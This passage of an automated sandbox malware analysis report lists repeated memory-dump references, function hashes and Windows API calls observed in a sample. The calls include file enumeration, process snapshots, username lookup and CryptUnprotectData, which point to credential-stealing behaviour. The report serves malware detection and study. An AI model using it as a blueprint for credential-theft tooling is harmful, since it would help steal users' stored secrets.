                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFindFirstwsprintf
                                                                                                                                                                                                                                                        • String ID: %s\*
                                                                                                                                                                                                                                                        • API String ID: 2655791690-766152087
                                                                                                                                                                                                                                                        • Opcode ID: f36b3378b15d1f5d5fde8085ea15248568b596d6ed58e0d3d509578a6e57e520
                                                                                                                                                                                                                                                        • Instruction ID: 90b441f89b1465ecf8b97dbb97e665e3f3f9459b08b614f0aa4c8b12e4c87353
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f36b3378b15d1f5d5fde8085ea15248568b596d6ed58e0d3d509578a6e57e520
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5F01DF36A01309DFC310DB28CC85E6A77BAEF89315B080468E806DB391F734AE55CB95
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 004025E5
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFindFirst
                                                                                                                                                                                                                                                        • String ID: \*.*
                                                                                                                                                                                                                                                        • API String ID: 1974802433-1173974218
                                                                                                                                                                                                                                                        • Opcode ID: 6c0f6e40f7656dc4f9e930a96511ac21cadf279f6f3a8f1b84d087ded89e2c0f
                                                                                                                                                                                                                                                        • Instruction ID: 817365079b64f86dd5f2691e91b9a3ddbac61f4b55a9e4ab2a1f459605ec19e7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6c0f6e40f7656dc4f9e930a96511ac21cadf279f6f3a8f1b84d087ded89e2c0f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89412976A01708CFC704DB5CDC91EA877B5BF95394B0901A8E929D7362D670EA09CB48
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 004319BF
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFindFirst
                                                                                                                                                                                                                                                        • String ID: %s\%s
                                                                                                                                                                                                                                                        • API String ID: 1974802433-4073750446
                                                                                                                                                                                                                                                        • Opcode ID: 15ec93414f8cc4c11765d3d5c2a843858d4756158e7c1c70b9c3ec0ca7c0e4dc
                                                                                                                                                                                                                                                        • Instruction ID: 49d1ce68f4e304ab077309865712af29e8a3aedbb7a5503adc9594e326f18457
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 15ec93414f8cc4c11765d3d5c2a843858d4756158e7c1c70b9c3ec0ca7c0e4dc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88118070A002059FEB14DF28DD84D6A73F9EF89300B144169F909DB352EB74AD51CBE5
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00436D60
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFindFirst
                                                                                                                                                                                                                                                        • String ID: %s\*
                                                                                                                                                                                                                                                        • API String ID: 1974802433-766152087
                                                                                                                                                                                                                                                        • Opcode ID: 3917b165b5ae9b7f74566b22b4674e384f977defe4e869b7a94d4836765c4ead
                                                                                                                                                                                                                                                        • Instruction ID: 2d2bd14d2163ecb9541dd12a3b71ba6ffc368ac0df7ff0a62789c457f15938a2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3917b165b5ae9b7f74566b22b4674e384f977defe4e869b7a94d4836765c4ead
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A7F0E2B1A142049FC3149B68DC92E6A37EEEF84206F050528F91AD73A2E279F9048F58
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetUserNameA.ADVAPI32(00000000), ref: 0042ED8C
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: NameUser
                                                                                                                                                                                                                                                        • String ID: Tv)>
                                                                                                                                                                                                                                                        • API String ID: 2645101109-2960183627
                                                                                                                                                                                                                                                        • Opcode ID: b36458ee66799f8a1871c2c726d2f13c41f2a4d8d68f18e28e4d1d3a282bbff2
                                                                                                                                                                                                                                                        • Instruction ID: 60bd1c9c5f05273e0424e2c52975cee27000371f3c630ae1d2b997ca714f0b9c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b36458ee66799f8a1871c2c726d2f13c41f2a4d8d68f18e28e4d1d3a282bbff2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9E046F23002142FD204975DAC80FAB779DCBC8269B0A0075F608C7311D238ACA596AA
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InfoSystemwsprintf
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2452939696-0
                                                                                                                                                                                                                                                        • Opcode ID: a7f3a64f85efc30cf96aff29990b38053308bc5fdb8e36b9ef575e3c2070f3bb
                                                                                                                                                                                                                                                        • Instruction ID: 1660de946c545f62e8e7feed56ea28d4bac36916aa83be0163193ad68dfdc243
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a7f3a64f85efc30cf96aff29990b38053308bc5fdb8e36b9ef575e3c2070f3bb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 77F0E9F66022345FD200EF04EE86D96776CEF86215B0A0625FD14B7311D626AD25C6BA
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0042F2C0
                                                                                                                                                                                                                                                        • Process32First.KERNEL32(00000000), ref: 0042F2CF
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2353314856-0
                                                                                                                                                                                                                                                        • Opcode ID: 8dc6191a8412e8162563e3890ab0d1566c80705a6d43bc5899ecdc5d32b73f19
                                                                                                                                                                                                                                                        • Instruction ID: b8272b7058a47ab05d16a3a4e3a42c2f64837ea2bf43379106ea56634cfc2327
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8dc6191a8412e8162563e3890ab0d1566c80705a6d43bc5899ecdc5d32b73f19
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 45F06571201305AFD7509B29DC46F667BB89F4E302F01416DBE11DB2E2D630DC248796
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 004025E5
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFindFirst
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1974802433-0
                                                                                                                                                                                                                                                        • Opcode ID: 79eb9627fab6b144517221ab6bbc0b9a7c444b89a3c7fb08ec041314d3100e9e
                                                                                                                                                                                                                                                        • Instruction ID: f75aed0b1d1e162924e4ebdbc172b8d49780232cc921cbccd888f32bff861f27
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 79eb9627fab6b144517221ab6bbc0b9a7c444b89a3c7fb08ec041314d3100e9e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6410576A017088FC704DF5CDC91EA977B5BBC9784B094069E92AD7362DA70FA09CB44
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00426F47
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFindFirst
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1974802433-0
                                                                                                                                                                                                                                                        • Opcode ID: 5d080295a2979537de853f50302e2bd9a86a039f6a76826fb253456ba8864eb8
                                                                                                                                                                                                                                                        • Instruction ID: cd49d3ec62cf6a293e3b75d498c2b0704ff449cafc62a06c9fb036c2c43035ee
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d080295a2979537de853f50302e2bd9a86a039f6a76826fb253456ba8864eb8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 023134357003688FC708EF6DDC80E5A37B9EF99710B050565E82AC7372DA24EF48CA68
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00425867
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFindFirst
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1974802433-0
                                                                                                                                                                                                                                                        • Opcode ID: d0c3902d2c9e9cb1fd2b666241de148cccdd80166b5fe0c4b1533d94ff945b62
                                                                                                                                                                                                                                                        • Instruction ID: 3f61e3797538ea5b5e3beb9c8f2060108314d02d328e1f6e5641947ec37d7391
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0c3902d2c9e9cb1fd2b666241de148cccdd80166b5fe0c4b1533d94ff945b62
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A2119766403189FC702DBAEDDC99997BF9EB896067040454E811E7362DB38EE06CB5C
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CryptUnprotectData.CRYPT32 ref: 00425470
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CryptDataUnprotect
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 834300711-0
                                                                                                                                                                                                                                                        • Opcode ID: 4dd443f83702cf8b6105b91fb563fa8455256e4d4e18ff175cdb6cf994c03a0b
                                                                                                                                                                                                                                                        • Instruction ID: cb7de199661f286802a37fc83a51937b8a1f7836089c6c8bc93ee743049ff453
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4dd443f83702cf8b6105b91fb563fa8455256e4d4e18ff175cdb6cf994c03a0b
